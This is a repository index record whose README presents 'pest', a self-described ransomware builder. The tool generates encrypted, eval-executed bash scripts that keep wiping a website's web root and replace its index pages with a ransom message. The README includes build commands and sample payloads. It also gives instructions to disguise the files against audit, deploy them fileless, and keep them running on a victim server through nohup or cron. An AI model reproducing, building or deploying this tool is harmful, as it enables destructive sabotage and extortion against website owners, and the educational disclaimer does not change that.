{"id":35190534,"url":"https://github.com/phrenotype/pest","last_synced_at":"2026-05-18T12:09:31.701Z","repository":{"id":108319856,"uuid":"580596553","full_name":"phrenotype/pest","owner":"phrenotype","description":"A poor man's ransomeware","archived":false,"fork":false,"pushed_at":"2024-08-08T20:50:09.000Z","size":24,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-11T19:56:11.480Z","etag":null,"topics":["hacking-tool","ransomeware","ransomware-builder","reverse-shell","shell"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/phrenotype.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-12-21T00:29:13.000Z","updated_at":"2024-08-08T20:50:13.000Z","dependencies_parsed_at":"2023-08-30T21:33:31.747Z","dependency_job_id":null,"html_url":"https://github.com/phrenotype/pest","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/phrenotype/pest","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phrenotype%2Fpest","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phrenotype%2Fpest/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phrenotype%2Fpest/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phrenotype%2Fpest/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/phrenotype","download_url":"https://codeload.github.com/phrenotype/pest/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phrenotype%2Fpest/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28111200,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-12-29T02:00:07.021Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking-tool","ransomeware","ransomware-builder","reverse-shell","shell"],"created_at":"2025-12-29T05:38:53.094Z","updated_at":"2025-12-29T05:38:56.102Z","avatar_url":"https://github.com/phrenotype.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PEST\r\n\r\nThis is for **educational purposes** only. I bear no responsibility for what you use this for. For this reason, no specific tutorial will be given for how exactly when or where to use this tool.\r\n\r\nThis is a fire and forget way to keep a webmaster confused.\r\n\r\nUsing the build tool, you can generate two different types of bash files that will perform differently.\r\n\r\n- Loop wiper : Will consistently wipe the webroot and replace the index.php/index.html with a custom message. Runs in an infinite loop.\r\n\r\n- Cron wiper : Same as the **loop**, but runs only once as it is intended to be added as a cron job.\r\n\r\nAnd yes, it's an encrypted malware.\r\n\r\n# How it works\r\n\r\nA developer will get a message on the web root in an `index.php` and `index.html` file. No matter what he/she does, They cannot get rid of those files. They're back after being deleted and no other file can be uploaded. Any file uploaded to the web root also gets deleted almost immediately.\r\n\r\n# Usage\r\n\r\n\r\nFirst clone the git repo\r\n\r\n```bash\r\n$ git clone https://github.com/phrenotype/pest.git\r\n```\r\n\r\nThen move into the directory\r\n\r\n```bash\r\n$ cd pest\r\n```\r\n\r\nAs usual, to see usage,\r\n\r\n```bash\r\n$ ./pest -h\r\n```\r\nor\r\n```bash\r\n$ ./pest --help\r\n```\r\n\r\nTo build the final product you need the following\r\n\r\n- The webroot path\r\n- A custom message (A ransom message maybe)\r\n- Sleep time in seconds (This **ONLY** for loop wiper). This serves as a delay between each run.\r\n\r\nThen you get a copy of **pest** either by cloning this repo or just copying and pasting the code.\r\n\r\nMake it executable by running\r\n\r\n```bash\r\n$ chmod +x pest\r\n```\r\n\r\nTo build a **loop wiper**, run:\r\n\r\n```bash\r\n$ ./pest -o './.loop_wiper' --type loop --target '/home/test/public_html' --message 'Pwned' --sleep 20\r\n```\r\n\r\nA file named **\".loop_wiper\"** will be created. It's contents will look like this\r\n\r\n```bash\r\n#!/usr/bin/env bash\r\ndecrypted=$(printf \"%s\" \"W+he7Uqi3ikGjXGzXBePZ+fYDatV1LbrcDr/yIxwDi2DpL/BCFW/E6eqnZwvOFRY\r\n4rK5AAENxiNA04Vl53lX5vPyGS311mf7PtMr8B5s69fmLUWIXtxFB5R2plpssbNK\r\negc4N0V0ARZBeZiWUMZwMBzCEwED4CUdUXUTK5rkiDrJZDWSzXSN0AfYMCzroLDR\r\n0mM3cWyJGlS1Q7vUCCwSFPBoR1dqmz1bBNu5m0meyzTtgK5Zp+r3oQtBPtrtU3M7\r\njCMNVADVchN/h/13Qu5p5y+K+b6FyTdeC9WK63geRwxtYwG+fPl+OLJia/v5P1ai\r\ntl30B1kOMC3MVb7uqNlqvadM15AUDqf2he13F7xKVIvPRfjJWXXIBKR06Jb7luNb\r\nXXKiavdZLQ1cSa228BmLq82OO5YMJkIpz3/5mQIc90x6RuXFLUUZKeAg20KMsdak\r\nnHT24WyIYefs/yfSQTX2mPp3apyTpWBSKoqwM2cpKv0g0u2OuR/HXW2eh2qaVZUe\r\n5+5LlogpyYO1tQq021Av3UCITlyP72ntB2N7xyUNTZz2SfZj964gmnxvjyTLUIF3\r\nFy23Qo0I5KIra0N2gfdvyrWq87FuPaikefZ/R4JwpQOmVQOv6b3kmKazwZsk53Vz\r\n9L+nj5oi6WeKS9PhSZc/afhVVjIFecM5gjjeeH7Vc/IWrGnTm/ysUF/axqgYf3mM\r\nFgQTDUE8W4uqg0mtpJ/3YQ==\" | openssl enc -aes-256-cbc -K \"15e05fe50a515531dff8ad9cdbcf436f9c58cc42a957deb234e893a1eeeb6a29\" -iv \"987fe6150619524e9808de0f73e82958\" -d -a);\r\neval \"$decrypted\";\r\n```\r\n\r\n\r\nTo build a **cron wiper**, run:\r\n\r\n```bash\r\n$ ./pest -o './.cron_wiper' --type cron --target '/home/test/public_html' --message 'Pwned'\r\n```\r\n\r\nA file named **\".cron_wiper\"** will be created. It's contents will look like something similar to this  \r\n\r\n```bash\r\n#!/usr/bin/env bash\r\ndecrypted=$(printf \"%s\" \"jWEooyZX/90ZzRmU5R7cLADvaPnOXfsM3uDcSDy6N5mNbUHxy60P+T3XhnDvC5R0\r\ntc/teiUwRGgYGRnhqpSNfddfvrSwdmolZdpAGxQqUqVtP0VW+BwoCPpwHKbVxkeQ\r\nN34d/kIgrw13dqKd42GW5RZrNpOtC9KXvquM9SOsKM3SvR2BtX6X9gdhUCr5qC+y\r\nNDnIIkuPL6r6gsZsT4dcb3X8kZw60tTodE/ZrkTWfRYpVQiRk7jKxbPBBFcysLef\r\nxSxyi4/06OQaF4ubqdtBEewyjq2xDqnQevECkH3Mh1UBtbZBOewOJ+tDlW7/PY7O\r\njhA0+7cDfzyk9lJQ6FEiLqoU8MgCwWKBx/BYZ2gsZSpABFBRdcrY0FsosJ8lwrBO\r\nsMn3WFFxh2G+EAdjkq+JOlVwvl+Kq2KovTQ5v2dnKOBYtyf0nfOiceUvQcawPuuy\r\nPIxjRx3ohE9q+6H1y/81H1SKUHhQaFAOPACdFkZqXjOzEzvSdWXLnt8NctA7kHxt\r\nf+qDnwaMmDhTev66WtV8Nv37i19asPWXXInISAdLVScrEiIAodVhnO4Hvddwotbs\r\nTlMBsUP8ydfIkmLq0Auj6bDR9yWPEkcjFGaRVdzU9x8=\" | openssl enc -aes-256-cbc -K \"b13bb24222c310030f50cd6643b8c9f07b69342318c2e060b95176b644832d39\" -iv \"372ce7a88dab703e9ad86eb0f802fe49\" -d -a);\r\neval \"$decrypted\";\r\n```\r\n\r\n**NOTE**: The path you pass via --target should be a path that exists on your target server.\r\n\r\n\r\n## Obfuscation\r\nIt is important you obfuscate these generated files by changing the file names, making them dot files and adding useless whitespace and comments at the top of the file to distract during manual audit.\r\n\r\nAlso note that the cron wiper is discouraged as it raises attention and is quick to spot.\r\n\r\nWhenever possible, deploy it in a fileless manner.\r\n\r\n## Using the generated files\r\nTo run the loop_wiper, upload the generated **.loop_wiper** file to the target server and make it executable by running  \r\n\r\n```bash\r\n$ chmod +x .loop_wiper\r\n```\r\n\r\nthen run the following command on the target server\r\n\r\n```bash\r\n$ nohup ./.loop_wiper \u0026 disown\r\n```\r\n\r\nTo run the .cron_wiper, **add it the the list of cron jobs**. Using the cpanel or **crontab** command.\r\n\r\n# Finally\r\nAnd that's it. If you find this page confusing, or you have no idea what's going on, you should not be here at all. I know, it feels frustrating and you feel left out, and that's okay. Go build a website or an app.\r\n\r\n# Contact\r\nEmail: dev@paulrobert.xyz\r\n\r\nTwitter: ![Twitter followers](https://img.shields.io/twitter/follow/phrenotyper?style=social)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fphrenotype%2Fpest","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fphrenotype%2Fpest","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fphrenotype%2Fpest/lists"}